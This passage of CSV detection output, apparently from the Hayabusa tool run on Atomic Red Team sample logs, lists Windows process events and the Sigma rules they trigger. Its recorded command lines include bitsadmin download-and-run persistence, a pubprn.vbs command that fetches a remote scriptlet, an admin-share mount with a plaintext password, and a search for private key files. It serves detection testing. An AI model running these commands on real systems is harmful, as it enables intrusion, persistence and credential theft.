https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 
747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin 
Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 
747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 
747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 
+09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query 
Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query 
Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query 